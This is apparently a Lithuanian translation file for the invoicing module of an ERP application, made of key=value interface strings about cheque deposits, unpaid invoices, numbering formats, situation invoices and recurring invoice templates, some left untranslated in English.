MenuChequesReceipts=Čekių įplaukos NewChequeDeposit=Naujas depozitas ChequesReceipts=Čekių įplaukos ChequesArea=Čekių depozitų sritis ChequeDeposits=Čekių depozitai Cheques=Čekiai DepositId=Id deposit NbCheque=Number of checks CreditNoteConvertedIntoDiscount=This %s has been converted into %s UsBillingContactAsIncoiveRecipientIfExist=Naudoti kliento kontaktinį adresą, o ne trečiosios šalies, kaip sąskaitų-faktūrų gavėjo, adresą ShowUnpaidAll=Rodyti visas neapmokėtas sąskaitas-faktūras ShowUnpaidLateOnly=Rodyti tik vėluojančias neapmokėtas sąskaitas PaymentInvoiceRef=Mokėjimo sąskaita-faktūra %s ValidateInvoice=Sąskaitą-faktūrą pripažinti galiojančia ValidateInvoices=Validate invoices Cash=Grynieji pinigai Reported=Uždelstas DisabledBecausePayments=Neįmanoma nuo tada, kai atsirado kai kurie mokėjimai CantRemovePaymentWithOneInvoicePaid=Negalima pašalinti mokėjimo, nuo tada kai čia yra bent viena sąskaita-faktūra priskirta apmokėtoms ExpectedToPay=Laukiamas mokėjimas CantRemoveConciliatedPayment=Can't remove conciliated payment PayedByThisPayment=Sumokėta šiuo mokėjimu ClosePaidInvoicesAutomatically=Classify "Paid" all standard, down payment or replacement invoices entirely paid. ClosePaidCreditNotesAutomatically=Priskirtii "Apmokėta" visas pilnai grąžintas kreditines sąskaitas. ClosePaidContributionsAutomatically=Classify "Paid" all social or fiscal contributions entirely paid. AllCompletelyPayedInvoiceWillBeClosed=Visos sąskaitos-faktūros, neturinčios neapmokėto likučio bus automatiškai uždarytos ir perkeltos į "Apmokėta". ToMakePayment=Mokėti ToMakePaymentBack=Grąžinti ListOfYourUnpaidInvoices=Sąrašas neapmokėtų sąskaitų-faktūrų NoteListOfYourUnpaidInvoices=Pastaba: Šis sąrašas rodo tik sąskaitas trečiosioms šalims, su kuriom Jūs susijęs kaip prekybos atstovas. RevenueStamp=Įplaukų rūšis YouMustCreateInvoiceFromThird=This option is only available when creating invoice from tab "customer" of third party YouMustCreateInvoiceFromSupplierThird=This option is only available when creating invoice from tab "supplier" of third party YouMustCreateStandardInvoiceFirstDesc=You have to create a standard invoice first and convert it to "template" to create a new template invoice PDFCrabeDescription=Sąskaitos-faktūros PDF šablonas Crabe. Pilnas sąskaitos-faktūros šablonas (rekomenduojamas Šablonas) PDFCrevetteDescription=Invoice PDF template Crevette. A complete invoice template for situation invoices TerreNumRefModelDesc1=Grąžinimo numeris formatu %syymm-nnnn standartinėms sąskaitoms-faktūroms ir %syymm-nnnn kreditinėms sąskaitoms, kur yy yra metai, mm mėnuo ir nnnn yra seka be pertrūkių ir be grįžimo į 0 MarsNumRefModelDesc1=Return number with format %syymm-nnnn for standard invoices, %syymm-nnnn for replacement invoices, %syymm-nnnn for down payment invoices and %syymm-nnnn for credit notes where yy is year, mm is month and nnnn is a sequence with no break and no return to 0 TerreNumRefModelError=Sąskaita, prasidedanti $syymm, jau egzistuoja ir yra nesuderinama su šiuo sekos modeliu. Pašalinkite ją arba pakeiskite jį, kad aktyvuoti šį modulį. CactusNumRefModelDesc1=Return number with format %syymm-nnnn for standard invoices, %syymm-nnnn for credit notes and %syymm-nnnn for down payment invoices where yy is year, mm is month and nnnn is a sequence with no break and no return to 0 ##### Types de contacts ##### TypeContact_facture_internal_SALESREPFOLL=Atstovas šiai kliento sąskaitai-faktūrai TypeContact_facture_external_BILLING=Kliento sąskaitos-faktūros kontaktas TypeContact_facture_external_SHIPPING=Kliento pristatymo kontaktas TypeContact_facture_external_SERVICE=Kliento paslaugos kontaktai TypeContact_invoice_supplier_internal_SALESREPFOLL=Atstovas šiai tiekėjo sąskaitai-faktūrai TypeContact_invoice_supplier_external_BILLING=Tiekėjo sąskaitos-faktūros kontaktai TypeContact_invoice_supplier_external_SHIPPING=Tiekėjo pristatymo kontaktai TypeContact_invoice_supplier_external_SERVICE=Tiekėjo paslaugos kontaktai # Situation invoices InvoiceFirstSituationAsk=First situation invoice InvoiceFirstSituationDesc=The <b>situation invoices</b> are tied to situations related to a progression, for example the progression of a construction. Each situation is tied to an invoice. InvoiceSituation=Situation invoice InvoiceSituationAsk=Invoice following the situation InvoiceSituationDesc=Create a new situation following an already existing one SituationAmount=Situation invoice amount(net) SituationDeduction=Situation subtraction ModifyAllLines=Modify all lines CreateNextSituationInvoice=Create next situation ErrorFindNextSituationInvoice=Error unable to find next situation cycle ref ErrorOutingSituationInvoiceOnUpdate=Unable to outing this situation invoice. ErrorOutingSituationInvoiceCreditNote=Unable to outing linked credit note. NotLastInCycle=This invoice is not the latest in cycle and must not be modified. DisabledBecauseNotLastInCycle=The next situation already exists. DisabledBecauseFinal=This situation is final. situationInvoiceShortcode_AS=AS situationInvoiceShortcode_S=Se CantBeLessThanMinPercent=The progress can't be smaller than its value in the previous situation. NoSituations=No open situations InvoiceSituationLast=Final and general invoice PDFCrevetteSituationNumber=Situation N°%s PDFCrevetteSituationInvoiceLineDecompte=Situation invoice - COUNT PDFCrevetteSituationInvoiceTitle=Situation invoice PDFCrevetteSituationInvoiceLine=Situation N°%s : Inv. N°%s on %s TotalSituationInvoice=Total situation invoiceLineProgressError=Invoice line progress can't be greater than or equal to the next invoice line updatePriceNextInvoiceErrorUpdateline=Error : update price on invoice line : %s ToCreateARecurringInvoice=To create a recurring invoice for this contract, first create this draft invoice, then convert it into an invoice template and define the frequency for generation of future invoices. ToCreateARecurringInvoiceGene=To generate future invoices regularly and manually, just go on menu <strong>%s - %s - %s</strong>. ToCreateARecurringInvoiceGeneAuto=If you need to have such invoices generated automatically, ask you administrator to enable and setup module <strong>%s</strong>. Note that both method (manual and automatic) can be used together with no risk of duplication. DeleteRepeatableInvoice=Delete template invoice ConfirmDeleteRepeatableInvoice=Are your sure you want to delete the template invoice? CreateOneBillByThird=Create one invoice per third party (otherwise, one invoice per order) BillCreated=%s bill(s) created StatusOfGeneratedDocuments=Status of document generation DoNotGenerateDoc=Do not generate document file AutogenerateDoc=Auto generate document file AutoFillDateFrom=Set start date for service line with invoice date AutoFillDateFromShort=Set start date AutoFillDateTo=Set end date for service line with next invoice date AutoFillDateToShort=Set end date MaxNumberOfGenerationReached=Max number of gen. reached